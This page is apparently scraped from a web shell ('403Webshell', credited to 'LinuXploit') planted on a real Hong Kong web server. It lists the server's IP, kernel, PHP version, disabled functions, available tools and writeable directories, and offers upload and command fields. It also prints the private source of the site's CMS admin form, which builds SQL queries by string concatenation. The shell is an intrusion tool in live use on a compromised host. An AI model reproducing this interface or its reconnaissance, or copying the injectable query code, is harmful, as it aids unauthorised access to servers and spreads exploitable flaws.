403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/kelvin/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/kelvin/webadmin/product_detail_addform.php
<?php
include 'config.php';

// Check if the user is logged in

if ((!isSet($_SESSION['loginname'])) || ($loggin <> '1'))
{
header("Location: login.php");
exit;
}
require("configure.php");
require("fckeditor/fckeditor.php");
$sql1 = "select * from product_cat where levelnum = '1' order by pdcatsort ASC ";
$result1 = mysql_query($sql1);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Content Management System (CMS)</title>
<link rel="stylesheet" href="chosen/chosen.css" />

</head>
<body>
<form action="product_detail_add.php" method="post" name="addform" enctype="multipart/form-data">
<table border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td height="70" align="right" valign="middle" class="icontxt"><table border="0" cellpadding="0" cellspacing="0">
      <tr>        
        <td width="50" align="center"><a href="#" onClick="addform.submit()"><img src="images/iconSave.png" alt="Save" width="32" height="32" border="0"><br>
          &nbsp;Save&nbsp;&nbsp;</a></td>
        <td width="50" align="center"><a href="product_detail_index.php?msg=Cancel"><img src="images/iconCancel.png" alt="Cancel" width="32" height="32" border="0"><br>
          &nbsp;Cancel&nbsp;&nbsp;</a></td>
        <td>&nbsp;</td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td class="pagetitletxt">&nbsp;&nbsp;<b><img src="images/iconList.jpg" width="48" height="48" align="absmiddle" />Add: Product Detail</b></td>
  </tr>
  <tr>
    <td align="left" valign="middle"><!-- Content -->
	<table border="0" cellpadding="0" cellspacing="2">
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Category</td>
			<td class='content' valign="top">:&nbsp;</td>
			<td class='content'><div class="side-by-side clearfix"><div>
				<select data-placeholder="Choose a Product Category" class="cat-select" multiple style="width:800px;" tabindex="4" name="pdcatidSelect[]">
				<?php echo getSubLevel(0); ?>
				</select></div>
			</div></td>
		</tr>
		<!--<tr>
        	<td width="120" align="right" valign="top" class='content'>Code</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input type="text" class="content" name="pdcode" size="50" maxlength="20"><br><span class="msg">Maxlength:20</span></td>
		</tr>-->

		<tr>
			<td width="120" align="right" valign="top" class='content'>Material Logo</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'>
				<?php
					$sql2 = "select * from material_logo where status=1 ";
					$result2 = mysql_query($sql2);
					while($row2 = mysql_fetch_array($result2)){
				?>
						<input type="checkbox" name="material_logo[]" value="<?=$row2{"material_logoid"}?>" /><img src="../images/material_logo/<?=$row2{"material_logoimgen"}?>" style="width:100px;"/><br>
				<?php
					}
				?>


			</td>
		</tr>

        <tr>
            <td width="120" align="right" valign="top" class='content'><b>English</b></td>
            <td class='content' valign="top">&nbsp;</td>
            <td class='content'>&nbsp;</td>
        </tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Title</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input type="text" class="content" name="pdtitleen" size="50" maxlength="500"><br><span class="msg">Maxlength:500</span></td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Image</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input name="pdimgen" type="file" class="content" size="100"  />

			</td>
		</tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Description</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><?php
					$sBasePath = $_SERVER['PHP_SELF'] ;
					$sBasePath = "fckeditor/";
					
					$oFCKeditor = new FCKeditor('pddescen') ;
					$oFCKeditor->BasePath	= $sBasePath ;
					$oFCKeditor->Value		= "";
					$oFCKeditor->Width 		= 630;
					$oFCKeditor->Height		= 300;
					$oFCKeditor->Create() ;			
					?><br><span class="msg">Maxwidth:610</span><br></td>
		</tr>

		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Specification Description</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><?php
					$sBasePath = $_SERVER['PHP_SELF'] ;
					$sBasePath = "fckeditor/";

					$oFCKeditor = new FCKeditor('pdspecen') ;
					$oFCKeditor->BasePath	= $sBasePath ;
					$oFCKeditor->Value		= "";
					$oFCKeditor->Width 		= 630;
					$oFCKeditor->Height		= 300;
					$oFCKeditor->Create() ;
				?><br><span class="msg">Maxwidth:610</span><br></td>
		</tr>


        <tr>
            <td width="120" align="right" valign="top" class='content'><b>Traditional Chinese</b></td>
            <td class='content' valign="top">&nbsp;</td>
            <td class='content'>&nbsp;</td>
        </tr>
		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Title</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input type="text" class="content" name="pdtitletc" size="50" maxlength="500"><br><span class="msg">Maxlength:500</span></td>
		</tr>

		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Image</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><input name="pdimgtc" type="file" class="content" size="100"  />

			</td>
		</tr>

		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Description</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><?php
					$sBasePath = $_SERVER['PHP_SELF'] ;
					$sBasePath = "fckeditor/";
					
					$oFCKeditor = new FCKeditor('pddesctc') ;
					$oFCKeditor->BasePath	= $sBasePath ;
					$oFCKeditor->Value		= "";
					$oFCKeditor->Width 		= 630;
					$oFCKeditor->Height		= 300;
					$oFCKeditor->Create() ;			
					?><br><span class="msg">Maxwidth:610</span><br></td>
		</tr>

		<tr>
			<td width="120" align="right" valign="top" class='content'>Product Specification Description</td>
			<td width="5" valign="top" class='content'>:&nbsp;</td>
			<td class='content'><?php
					$sBasePath = $_SERVER['PHP_SELF'] ;
					$sBasePath = "fckeditor/";

					$oFCKeditor = new FCKeditor('pdspectc') ;
					$oFCKeditor->BasePath	= $sBasePath ;
					$oFCKeditor->Value		= "";
					$oFCKeditor->Width 		= 630;
					$oFCKeditor->Height		= 300;
					$oFCKeditor->Create() ;
				?><br><span class="msg">Maxwidth:610</span><br></td>
		</tr>

	</table>
	<!-- End Content --></td>
  </tr>
  <tr>
    <td align="left" valign="middle">&nbsp;</td>
  </tr>
</table>
</form>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js" type="text/javascript"></script>
<script src="chosen/chosen.jquery.js" type="text/javascript"></script>
<script type="text/javascript"> $(".cat-select").chosen(); $(".cat-select-deselect").chosen({allow_single_deselect:true}); </script>
</body>
</html>
<?php
function getSubLevel($p, $sel)
{
	$n="";
	$sql1 = "select * from product_cat where parentid = ". $p ." ";
	$result1 = mysql_query($sql1);
	while ($row1 = mysql_fetch_array($result1,MYSQL_ASSOC))
	{
		$sql2 = "select * from product_cat where parentid = ". $row1{"pdcatid"} ." ";
		$rs2 = mysql_query($sql2);
		if( mysql_num_rows($rs2) > 0 ){
			$n .=   "<option value='".$row1{'pdcatid'}."' ". getSelect($sel, $row1{'pdcatid'}) ." >". str_repeat("&nbsp; - ", $row1["levelnum"]-1);
			if ($row1{'pdcattitleen'} <> '') {
				$n .=	$row1{'pdcattitleen'};
			}	else if ($row1{'pdcattitletc'} <> '') {
				$n .=	$row1{'pdcattitletc'};
			}
			$n .=	"</option>\n".getSubLevel($row1{'pdcatid'},$sel);
		}
		else{
			$n .=   "<option value='".$row1{'pdcatid'}."' ". getSelect($sel, $row1{'pdcatid'}) ." >". str_repeat("&nbsp; - ", $row1["levelnum"]-1);
			if ($row1{'pdcattitleen'} <> '') {
				$n .=	$row1{'pdcattitleen'};
			}	else if ($row1{'pdcattitletc'} <> '') {
				$n .=	$row1{'pdcattitletc'};
			}
			$n .=	"</option>\n"; 
		}
	}
	return $n;
}
/*function getSubLevel($p, $sel, $level=1)
{
	$n="";
	$sql1 = "select * from product_cat where parentid = ". $p ."  ";
	$result1 = mysql_query($sql1);
	while ($row1 = mysql_fetch_array($result1,MYSQL_ASSOC))
	{
		$sql2 = "select * from product_cat where parentid = ". $row1{"pdcatid"} ." ";
		$rs2 = mysql_query($sql2);
		if( mysql_num_rows($rs2) > 0 ){
			if ($level==1) {
				$n .=   "".getSubLevel($row1{'pdcatid'},$sel,$level+1);
			} else {
				$n .=   "<option value='". $row1{'pdcatid'} ."' ". getSelect($sel, $row1{'pdcatid'}) ." >". str_repeat("&nbsp; - ", $row1["levelnum"]-2). $row1{'pdcattitleen'} ."</option>\n".getSubLevel($row1{'pdcatid'},$sel,$level+1);
			}
		} else { 
			if ($level > 1) {
				$n .=   "<option value='". $row1{'pdcatid'} ."' ". getSelect($sel, $row1{'pdcatid'}) ." >". str_repeat("&nbsp; - ", $row1["levelnum"]-2). $row1{'pdcattitleen'} ."</option>\n";
			}
		}
	}
	return $n;
}
*/function getSelect($field1, $field2)
{
	if ($field1 == $field2)
	{
		return "selected";
	}
	else
	{
		return "";
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit